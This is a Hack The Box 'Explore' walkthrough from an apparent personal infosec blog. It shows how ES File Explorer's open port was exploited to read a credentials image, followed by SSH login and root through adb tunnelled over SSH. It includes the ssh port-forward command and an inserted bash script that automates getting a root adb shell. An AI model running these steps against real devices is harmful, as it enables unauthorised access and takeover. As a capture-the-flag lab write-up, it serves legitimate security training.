HTB — Explore Walkthrough

Julian's infosec blog
3 min read, Mar 7, 2022

Step 1 — Port Scanning / Reconnaissance

I used RustScan to scan for open ports, and you could already tell this was not a web server. I had never seen these ports before; after googling them I figured out it was an Android phone.

Step 2 — Research

This port was very interesting: it already had a known exploit, so I decided to explore it.

Step 3 — Exploitation

The exploit is ES File Explorer 4.1.9.7.4 Arbitrary File Read. I downloaded the Python script from Exploit Database.

I used the help command to list all the actions the script supports and decided to try listFiles first. That was a disaster: a bunch of things popped up, none of interest. I then used listPics and got some interesting results.

You can see that this command led to the discovery of a picture file called creds.jpg. I then used the getFile command to download it to my local downloads folder.

Step 3a — Exploitation with Metasploit

You can also do this with Metasploit. I used the es_file_explorer_open_port module and set it up like this. I could see all the pictures using it.

I then switched the auxiliary ACTION to GETFILE, set the location of the creds.jpg file in ACTIONITEM, and ran it again.

We were able to download the file to our local machine.

Step 4 — User Shell & Flag

I used Kristi's credentials to SSH into port 2222, which is the port the phone's SSH service was listening on. I found the user flag in the sdcard folder.

Step 5 — Privilege Escalation & Root Flag

If you look at open port 5555, it is used by the Android Debug Bridge (adb), a tool that lets a computer communicate with an Android phone. If we can reach port 5555 through a local port forward, it's possible to bypass the usual USB connection by tunnelling over SSH. (See the adb readme.)

I ran ssh kristi@10.10.10.247 -L 5555:localhost:5555 -p 2222 to forward local port 5555 to port 5555 on the phone.

Now port 5555 is listening locally, and we need to set up the Android Debug Bridge. I connected with adb connect, giving the IP and port number, and then used adb devices to confirm the device had been added. Then I ran adb root before finally running adb shell to connect to the Android device as the root user.
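The step-5 sequence above as one script, added here as an example and not code from the original post: it opens the SSH local forward, waits until 127.0.0.1:5555 is actually listening, and only then runs the adb steps. The user name, SSH port and forward port come from the post; TARGET_HOST is a hypothetical placeholder the reader supplies, and the /dev/tcp port check assumes bash.

```bash
#!/usr/bin/env bash
# Added example, not from the original post. TARGET_HOST is a placeholder.
set -u

# Return 0 if something accepts TCP connections on host:port (bash /dev/tcp, no nc needed).
port_is_open() {
  local host=$1 port=$2
  (exec 3<>"/dev/tcp/${host}/${port}") 2>/dev/null
}

# Open the tunnel: local 127.0.0.1:<local_port> -> the phone's localhost:5555 (adbd),
# over SSH on port 2222. -N runs no remote command, -f backgrounds after auth, and
# ExitOnForwardFailure makes ssh fail loudly instead of silently dropping the forward.
open_adb_forward() {
  local user=$1 host=$2 ssh_port=${3:-2222} local_port=${4:-5555}
  if port_is_open 127.0.0.1 "$local_port"; then
    echo "local port $local_port is already in use" >&2
    return 1
  fi
  ssh -f -N -o ExitOnForwardFailure=yes -p "$ssh_port" \
      -L "${local_port}:localhost:5555" "${user}@${host}" || return 1
  local i
  for i in 1 2 3 4 5; do            # give ssh a moment to bind the listener
    port_is_open 127.0.0.1 "$local_port" && return 0
    sleep 1
  done
  echo "forward on port $local_port never came up" >&2
  return 1
}

# The adb steps from the post: connect through the tunnel, confirm the device is
# attached, restart adbd as root, then open a shell.
adb_root_shell() {
  local local_port=${1:-5555} dev="127.0.0.1:${1:-5555}"
  adb connect "$dev" || return 1
  adb devices | grep -q "^${dev}[[:space:]]*device" || { echo "$dev not attached" >&2; return 1; }
  adb root                 # only works on builds whose adbd is allowed to run as root
  adb connect "$dev"       # adbd restarts after 'adb root'; reconnecting is harmless if it stayed up
  adb shell
}

# Run end to end only when the reader supplies the placeholder target.
if [ -n "${TARGET_HOST:-}" ]; then
  open_adb_forward kristi "$TARGET_HOST" 2222 5555 && adb_root_shell 5555
fi
```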

To make everything easier, I redid this once I knew where everything was, and found the root flag in the data folder.

Thanks for reading!
